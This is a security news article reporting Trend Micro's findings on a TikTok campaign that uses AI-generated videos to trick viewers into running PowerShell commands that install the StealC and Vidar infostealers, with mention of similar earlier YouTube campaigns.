Social engineering campaign:TikTok videos with malware installation instructions

IT security researchers have tracked down a social engineering campaign on TikTok, in which the attackers want to foist malware on their victims. The perpetrators promise to offer cracked software – in the end. However, PowerShell commands end up in the clipboard, which victims execute and thus allow Infostealer to be foisted on them.

In an analysis, the IT researchers from Trend Micro go into more detail. According to this, the criminal masterminds allegedly produce AI-generated videos that supposedly demonstrate steps for activating software or unlocking premium functions. However, the instructions actually execute PowerShell commands. The infostealers StealC and Vidar then download these commands and install them on the victims' computers.

“Go where the users are”

The attackers try to find victims where they are on the move and receptive to social engineering: on social networks. However, while previous campaigns could be recognized by the presence of injected JavaScript on compromised landing pages, the perpetrators of this TikTok-based malware campaign rely on pure social engineering using only video content. The special feature of TikTok, with its huge user base and algorithmically increased reach is an ideal breeding ground for cyber criminals, Trend Micro's IT researchers explain.

Attackers achieve broad distribution without having to worry about their infrastructure, they explain further. By using AI-generated content, a campaign can be scaled up instead of just generating isolated incidents. Such videos can be produced quickly and customized for different user segments.

Another striking feature of the observed campaign is that the TikTok videos provide verbal instructions with which the victims execute PowerShell commands on their machines. This means that no malicious code is visible on the platform that could be targeted by security software.

One of the videos has received more than 20,000 likes and, according to the virus analysts, more than 100 comments. The TikTok analytics even showed a reach of 500,000 views. The malicious videos do indeed have a wide reach. Trend Micro does not state how many consumers of the malicious videos have actually been infected with the infostealers. However, the IT researchers still discuss the exact functioning of the PowerShell scripts and provide some indicators of compromise (IOCs) at the end.

Last year, cybercriminals tried something similar with YouTube videos. They promised cracked and illegally copied video games on channels that had been taken over by their regular owners, for example by phishing. However, the links led to malware – also to infostealers: the IT researchers found Lumma Stealer, StealC and Vidar. The attack technique used in the current malware campaign of sending commands to the victim's clipboard, which they then execute themselves according to instructions, has been quite popular for around a year. IT security researchers from Proofpoint warned about this attack technique in the middle of last year.

(dmk)